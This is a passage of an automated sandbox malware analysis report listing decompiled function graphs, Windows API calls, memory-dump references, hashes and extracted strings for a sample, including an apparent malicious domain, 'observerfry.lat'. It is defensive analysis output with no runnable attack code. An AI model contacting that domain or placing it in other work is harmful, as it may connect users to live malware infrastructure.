                                                                                                                                                                • Associated: 00000001.00000002.2570707941.0000000000A1F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570727284.0000000000A20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570748887.0000000000A21000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570862496.0000000000B7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570880362.0000000000B7F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570902630.0000000000B98000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570921145.0000000000B99000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570939408.0000000000B9B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570939408.0000000000BA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570976244.0000000000BA9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570997656.0000000000BAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571015581.0000000000BAC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571032814.0000000000BAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571061633.0000000000BD5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571080914.0000000000BD6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571104850.0000000000BDE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571123110.0000000000BE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571145095.0000000000C0D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571165129.0000000000C19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571183489.0000000000C1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571201365.0000000000C1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571223021.0000000000C24000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571241974.0000000000C26000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571266315.0000000000C2D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571284489.0000000000C30000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571304485.0000000000C39000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571322727.0000000000C3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571341364.0000000000C3C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571360880.0000000000C43000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571360880.0000000000C80000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571418658.0000000000CA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571437564.0000000000CAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571437564.0000000000CB1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571477078.0000000000CBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571495605.0000000000CBF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_1_2_9c0000_fnCae9FQhg.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: #E#G$+A#C$=]=_$_^]\$eN$rp
                                                                                                                                                                • API String ID: 0-3333364358
                                                                                                                                                                • Opcode ID: 863b72e49d649009a71ba493e38854434af783d0d83378816e36bdec51eb0391
                                                                                                                                                                • Instruction ID: b25f6e0bf6dc95eaca69de60893db5dabc539ed72ff943e1019f3a99f0a1152b
                                                                                                                                                                • Opcode Fuzzy Hash: 863b72e49d649009a71ba493e38854434af783d0d83378816e36bdec51eb0391
                                                                                                                                                                • Instruction Fuzzy Hash: 0A4236B1A04205CFD714CF69C891AAABBB2FF89310F1982ACD4459B3A5D738DD52CB91
                                                                                                                                                                Function 009E3B50 Relevance: 12.8, APIs: 2, Strings: 5, Instructions: 600COMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 1480 9e3b50-9e3bd2 1481 9e3be0-9e3c0c 1480->1481 1481->1481 1482 9e3c0e-9e3c4f RtlExpandEnvironmentStrings 1481->1482 1483 9e3c50-9e3c73 1482->1483 1483->1483 1484 9e3c75-9e3c7e 1483->1484 1485 9e3dfe-9e3e03 1484->1485 1486 9e3e0c-9e3e16 1484->1486 1487 9e3f9a-9e4035 1484->1487 1488 9e3ccb-9e3cd5 call 9c7f60 1484->1488 1489 9e3cd8-9e3ce1 1484->1489 1490 9e3f79 1484->1490 1491 9e3f69-9e3f71 1484->1491 1492 9e3c85-9e3c8c 1484->1492 1493 9e3ce2-9e3ce9 1484->1493 1494 9e3cc3 1484->1494 1485->1486 1499 9e3e1f 1486->1499 1500 9e3e18-9e3e1d 1486->1500 1495 9e4040-9e40ce 1487->1495 1488->1489 1508 9e3f7f-9e3f8b call 9c7f60 1490->1508 1491->1490 1501 9e3c8e-9e3c93 1492->1501 1502 9e3c95 1492->1502 1497 9e3ceb-9e3cf0 1493->1497 1498 9e3cf2 1493->1498 1494->1488 1495->1495 1503 9e40d4-9e40ea call 9e1d00 1495->1503 1505 9e3cf9-9e3d2f call 9c7f50 1497->1505 1498->1505 1506 9e3e26-9e3eba call 9c7f50 1499->1506 1500->1506 1507 9e3c98-9e3cbc call 9c7f50 RtlExpandEnvironmentStrings 1501->1507 1502->1507 1522 9e40f3-9e410f 1503->1522 1519 9e3d30-9e3d83 1505->1519 1520 9e3ec0-9e3ee5 1506->1520 1507->1485 1507->1486 1507->1487 1507->1488 1507->1489 1507->1490 1507->1491 1507->1493 1507->1494 1521 9e3f94 1508->1521 1519->1519 1523 9e3d85-9e3d8e 1519->1523 1520->1520 1524 9e3ee7-9e3ef0 1520->1524 1521->1487 1525 9e4110-9e415b 1522->1525 1526 9e3d90-9e3d96 1523->1526 1527 9e3db1-9e3dc5 1523->1527 1528 9e3ef2-9e3efa 1524->1528 1529 9e3f11-9e3f1f 1524->1529 1525->1525 1535 9e415d-9e41ce 1525->1535 1536 9e3da0-9e3daf 1526->1536 1531 9e3dc7-9e3dca 1527->1531 1532 9e3de1-9e3dea call a014b0 1527->1532 1530 9e3f00-9e3f0f 1528->1530 1533 9e3f41-9e3f62 call a014b0 1529->1533 1534 9e3f21-9e3f24 1529->1534 1530->1529 1530->1530 1537 9e3dd0-9e3ddf 1531->1537 1541 9e3def-9e3df7 1532->1541 1533->1488 1533->1489 1533->1490 1533->1491 1533->1508 1533->1521 1533->1522 1548 9e42ad-9e42b9 call 9c7f60 1533->1548 1549 9e42a7 1533->1549 1538 9e3f30-9e3f3f 1534->1538 1540 9e41d0-9e427b 1535->1540 1536->1527 1536->1536 1537->1532 1537->1537 1538->1533 1538->1538 1540->1540 1543 9e4281-9e429e call 9e1b60 1540->1543 1541->1485 1541->1486 1541->1487 1541->1490 1541->1491 1541->1508 1541->1522 1543->1549 1552 9e42bc 1548->1552 1549->1548 1552->1552
                                                                                                                                                                APIs
                                                                                                                                                                • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000,?), ref: 009E3C37
                                                                                                                                                                • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,?,?), ref: 009E3CB1
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000001.00000002.2570616598.00000000009C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                • Associated: 00000001.00000002.2570597510.00000000009C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570616598.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570687244.0000000000A15000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570707941.0000000000A1F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570727284.0000000000A20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570748887.0000000000A21000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570862496.0000000000B7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570880362.0000000000B7F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570902630.0000000000B98000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570921145.0000000000B99000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570939408.0000000000B9B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570939408.0000000000BA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570976244.0000000000BA9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570997656.0000000000BAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571015581.0000000000BAC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571032814.0000000000BAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571061633.0000000000BD5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571080914.0000000000BD6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571104850.0000000000BDE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571123110.0000000000BE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571145095.0000000000C0D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571165129.0000000000C19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571183489.0000000000C1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571201365.0000000000C1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571223021.0000000000C24000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571241974.0000000000C26000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571266315.0000000000C2D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571284489.0000000000C30000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571304485.0000000000C39000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571322727.0000000000C3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571341364.0000000000C3C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571360880.0000000000C43000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571360880.0000000000C80000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571418658.0000000000CA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571437564.0000000000CAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571437564.0000000000CB1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571477078.0000000000CBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571495605.0000000000CBF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_1_2_9c0000_fnCae9FQhg.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: EnvironmentExpandStrings
                                                                                                                                                                • String ID: #E#G$+A#C$=]=_$eN$rp
                                                                                                                                                                • API String ID: 237503144-3451580660
                                                                                                                                                                • Opcode ID: cc596c52e29dc1bac6ecbf2386bc0ebff5092cf32d75bdb25451fa0df940b346
                                                                                                                                                                • Instruction ID: 11c92bedc6fc699ded8a0df27c12eaffd01ca5eee08a34e0992f5e8c79bc4bc7
                                                                                                                                                                • Opcode Fuzzy Hash: cc596c52e29dc1bac6ecbf2386bc0ebff5092cf32d75bdb25451fa0df940b346
                                                                                                                                                                • Instruction Fuzzy Hash: C51206B1E11215CFDB14CF69C882AAABBB2FF85310F1982ACD445AF355D7349942CBD1
                                                                                                                                                                Function 009CCE45 Relevance: 7.8, APIs: 1, Strings: 4, Instructions: 342COMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 1553 9cce45-9cce78 call 9f3fd0 call 9c9780 CoUninitialize 1558 9cce80-9ccee4 1553->1558 1558->1558 1559 9ccee6-9ccef7 1558->1559 1560 9ccf00-9ccf20 1559->1560 1560->1560 1561 9ccf22-9ccf64 1560->1561 1562 9ccf70-9ccf92 1561->1562 1562->1562 1563 9ccf94-9ccf9c 1562->1563 1564 9ccf9e-9ccfa2 1563->1564 1565 9ccfbb-9ccfc3 1563->1565 1566 9ccfb0-9ccfb9 1564->1566 1567 9ccfdb-9ccfe6 1565->1567 1568 9ccfc5-9ccfc6 1565->1568 1566->1565 1566->1566 1570 9ccfec-9ccfed 1567->1570 1571 9cd08a 1567->1571 1569 9ccfd0-9ccfd9 1568->1569 1569->1567 1569->1569 1572 9ccff0-9ccff9 1570->1572 1573 9cd08d-9cd095 1571->1573 1572->1572 1574 9ccffb 1572->1574 1575 9cd0ad 1573->1575 1576 9cd097-9cd09b 1573->1576 1574->1573 1578 9cd0b0-9cd0bb 1575->1578 1577 9cd0a0-9cd0a9 1576->1577 1577->1577 1579 9cd0ab 1577->1579 1580 9cd0bd-9cd0bf 1578->1580 1581 9cd0cb-9cd0d7 1578->1581 1579->1578 1582 9cd0c0-9cd0c9 1580->1582 1583 9cd0d9-9cd0db 1581->1583 1584 9cd0f1-9cd1b1 1581->1584 1582->1581 1582->1582 1585 9cd0e0-9cd0ed 1583->1585 1586 9cd1c0-9cd1d2 1584->1586 1585->1585 1587 9cd0ef 1585->1587 1586->1586 1588 9cd1d4-9cd1f4 1586->1588 1587->1584 1589 9cd200-9cd252 1588->1589 1589->1589 1590 9cd254-9cd28a call 9cb7e0 1589->1590
                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000001.00000002.2570616598.00000000009C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                • Associated: 00000001.00000002.2570597510.00000000009C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570616598.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570687244.0000000000A15000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570707941.0000000000A1F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570727284.0000000000A20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570748887.0000000000A21000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570862496.0000000000B7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570880362.0000000000B7F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570902630.0000000000B98000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570921145.0000000000B99000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570939408.0000000000B9B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570939408.0000000000BA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570976244.0000000000BA9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570997656.0000000000BAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571015581.0000000000BAC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571032814.0000000000BAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571061633.0000000000BD5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571080914.0000000000BD6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571104850.0000000000BDE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571123110.0000000000BE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571145095.0000000000C0D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571165129.0000000000C19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571183489.0000000000C1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571201365.0000000000C1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571223021.0000000000C24000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571241974.0000000000C26000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571266315.0000000000C2D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571284489.0000000000C30000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571304485.0000000000C39000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571322727.0000000000C3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571341364.0000000000C3C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571360880.0000000000C43000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571360880.0000000000C80000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571418658.0000000000CA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571437564.0000000000CAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571437564.0000000000CB1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571477078.0000000000CBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571495605.0000000000CBF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_1_2_9c0000_fnCae9FQhg.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Uninitialize
                                                                                                                                                                • String ID: 6=.)$<1!9$`{tu$observerfry.lat
                                                                                                                                                                • API String ID: 3861434553-2148362831
                                                                                                                                                                • Opcode ID: 1104edbc528dc054b640755410204fe07d5bcfb789c7cadfc645c0b84f9b1e5e
                                                                                                                                                                • Instruction ID: 426b1a5a0dc321cce0eae792728a54e67e478ed5cca1714524c6760295737946
                                                                                                                                                                • Opcode Fuzzy Hash: 1104edbc528dc054b640755410204fe07d5bcfb789c7cadfc645c0b84f9b1e5e
                                                                                                                                                                • Instruction Fuzzy Hash: 02A1F1B46057818FDB16CF29C4D0B62BFE2BF96300B1885ACC4D64F75AD339A846CB52
                                                                                                                                                                Function 009C8600 Relevance: 4.1, Strings: 3, Instructions: 356COMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 1621 9c8600-9c8611 call 9fd9a0 1624 9c8a48-9c8a4a 1621->1624 1625 9c8617-9c861e call 9f62a0 1621->1625 1628 9c8624-9c864a 1625->1628 1629 9c8a31-9c8a38 1625->1629 1637 9c864c-9c864e 1628->1637 1638 9c8650-9c887f 1628->1638 1630 9c8a3a-9c8a40 call 9c7f60 1629->1630 1631 9c8a43 call 9fe080 1629->1631 1630->1631 1631->1624 1637->1638 1640 9c8880-9c88ce 1638->1640 1640->1640 1641 9c88d0-9c891d call 9fc540 1640->1641 1644 9c8920-9c8943 1641->1644 1645 9c8964-9c897c 1644->1645 1646 9c8945-9c8962 1644->1646 1648 9c8a0d-9c8a25 call 9c9d00 1645->1648 1649 9c8982-9c8a0b 1645->1649 1646->1644 1648->1629 1652 9c8a27 call 9ccb90 1648->1652 1649->1648 1654 9c8a2c call 9cb7b0 1652->1654 1654->1629
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000001.00000002.2570616598.00000000009C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                • Associated: 00000001.00000002.2570597510.00000000009C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570616598.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570687244.0000000000A15000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570707941.0000000000A1F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570727284.0000000000A20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570748887.0000000000A21000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570862496.0000000000B7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570880362.0000000000B7F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570902630.0000000000B98000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570921145.0000000000B99000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570939408.0000000000B9B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570939408.0000000000BA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570976244.0000000000BA9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570997656.0000000000BAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571015581.0000000000BAC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571032814.0000000000BAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571061633.0000000000BD5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571080914.0000000000BD6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571104850.0000000000BDE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571123110.0000000000BE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571145095.0000000000C0D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571165129.0000000000C19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571183489.0000000000C1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571201365.0000000000C1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571223021.0000000000C24000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571241974.0000000000C26000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571266315.0000000000C2D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571284489.0000000000C30000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571304485.0000000000C39000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571322727.0000000000C3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571341364.0000000000C3C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571360880.0000000000C43000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571360880.0000000000C80000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571418658.0000000000CA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571437564.0000000000CAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571437564.0000000000CB1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571477078.0000000000CBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571495605.0000000000CBF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_1_2_9c0000_fnCae9FQhg.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: FreeLibrary
                                                                                                                                                                • String ID: b]u)$}$}
                                                                                                                                                                • API String ID: 3664257935-2900034282
                                                                                                                                                                • Opcode ID: aca78305a520b0a176bc375d1699c5dd5cad41614050c45558a77dc74bc513f5
                                                                                                                                                                • Instruction ID: 188c5a0c56250aef254fa0e78f1a4664662ad8476ec8755af0452f60df13e780
                                                                                                                                                                • Opcode Fuzzy Hash: aca78305a520b0a176bc375d1699c5dd5cad41614050c45558a77dc74bc513f5
                                                                                                                                                                • Instruction Fuzzy Hash: 7CC1F673E187154BC708DF69C84135AF7D6ABC8710F0AC92DA898EB391EA74DC058BC6
                                                                                                                                                                Function 009ED34A Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 398COMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
